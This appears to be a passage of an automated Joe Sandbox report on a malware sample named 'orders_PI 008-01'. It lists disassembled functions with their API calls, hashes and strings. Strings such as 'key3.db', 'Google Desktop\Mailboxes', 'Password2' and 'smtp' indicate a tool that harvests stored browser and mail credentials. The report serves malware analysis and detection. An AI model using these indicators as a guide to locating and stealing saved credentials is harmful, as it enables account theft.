                                          • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                          • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$??2@??3@CloseCreateHandleReadSize
                                        • String ID: Ul@$key3.db
                                        • API String ID: 1968906679-1563549157
                                        • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                        • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                        • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                        • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                        Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strcmpi.MSVCRT ref: 0040E134
                                        • _strcmpi.MSVCRT ref: 0040E14D
                                        • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strcmpi$_mbscpy
                                        • String ID: smtp
                                        • API String ID: 2625860049-60245459
                                        • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                        • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                        • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                        • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                        Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        • memset.MSVCRT ref: 00408258
                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                        Strings
                                        • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Close$EnumOpenmemset
                                        • String ID: Software\Google\Google Desktop\Mailboxes
                                        • API String ID: 2255314230-2212045309
                                        • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                        • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                        • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                        • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                        Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040C28C
                                        • SetFocus.USER32(?,?), ref: 0040C314
                                          • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FocusMessagePostmemset
                                        • String ID: S_@$l
                                        • API String ID: 3436799508-4018740455
                                        • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                        • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                        • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                        • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                        Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy
                                        • String ID: C^@$X$ini
                                        • API String ID: 714388716-917056472
                                        • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                        • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                        • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                        • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                        Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                        • String ID: MS Sans Serif
                                        • API String ID: 3492281209-168460110
                                        • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                        • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                        • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                        • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                        Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClassName_strcmpimemset
                                        • String ID: edit
                                        • API String ID: 275601554-2167791130
                                        • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                        • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                        • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                        • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                        Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strlen$_mbscat
                                        • String ID: 3CD
                                        • API String ID: 3951308622-1938365332
                                        • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                        • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                        • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                        • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                        Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscat$_mbscpy
                                        • String ID: Password2
                                        • API String ID: 2600922555-1856559283
                                        • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                        • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                        • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                        • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                        Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75570A60,?,00000000), ref: 00410D1C
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathA$shell32.dll
                                        • API String ID: 2574300362-543337301
                                        • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                        • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                        • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                        • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                        Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: rows deleted
                                        • API String ID: 2221118986-571615504
                                        • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                        • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                        • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                        • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                        Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memcmp
                                        • String ID:
                                        • API String ID: 3384217055-0
                                        • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                        • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                        • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                        • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                        Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                        • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                        • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                        • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                        • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                        • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                        Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004048C2
                                        • memset.MSVCRT ref: 004048D6
                                        • memset.MSVCRT ref: 004048EA
                                        • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                        • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                        • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                        • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                        • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                        Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040D2C2
                                        • memset.MSVCRT ref: 0040D2D8
                                        • memset.MSVCRT ref: 0040D2EA
                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                        • memset.MSVCRT ref: 0040D319
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID:
                                        • API String ID: 368790112-0
                                        • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                        • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                        • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                        • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                        Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                        Download Yara Rule
                                        APIs
                                        • __allrem.LIBCMT ref: 00425850
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                        • __allrem.LIBCMT ref: 00425933
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 1992179935-0
                                        • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                        • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                        • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                        • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                        Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                        • too many SQL variables, xrefs: 0042C6FD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                        • API String ID: 2221118986-515162456
                                        • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                        • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                        • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                        • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                        Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                        • memset.MSVCRT ref: 004026AD
                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                          • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                          • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                        • LocalFree.KERNEL32(?), ref: 004027A6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                        • String ID:
                                        • API String ID: 3503910906-0
                                        • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                        • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                        • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                        • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                        Function 00407CBC Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                          • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                        • free.MSVCRT ref: 00407D7C
                                          • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                          • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                          • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`Wu,00407A43,00000001,?,00000000,`Wu,00407DBD,00000000,?,?), ref: 00406F64
                                          • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID: `Wu$`Wu$`Wu
                                        • API String ID: 3401966785-1094851910
                                        • Opcode ID: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                        • Instruction ID: d7b0144154ef41658eb0158d6140425370aaa91bbe4ae82c15578abe9a627f9f
                                        • Opcode Fuzzy Hash: 27aafa6304bec9719526772739a65833492d8f24c74b3a52ddc2ddb19e3e0dc7
                                        • Instruction Fuzzy Hash: DF5148B5D0821AAFCB109F99D4809ADFBB1BF44314B24817BE950B7391C738BE45CB96
                                        Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040C922
                                        • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                        • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                        • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
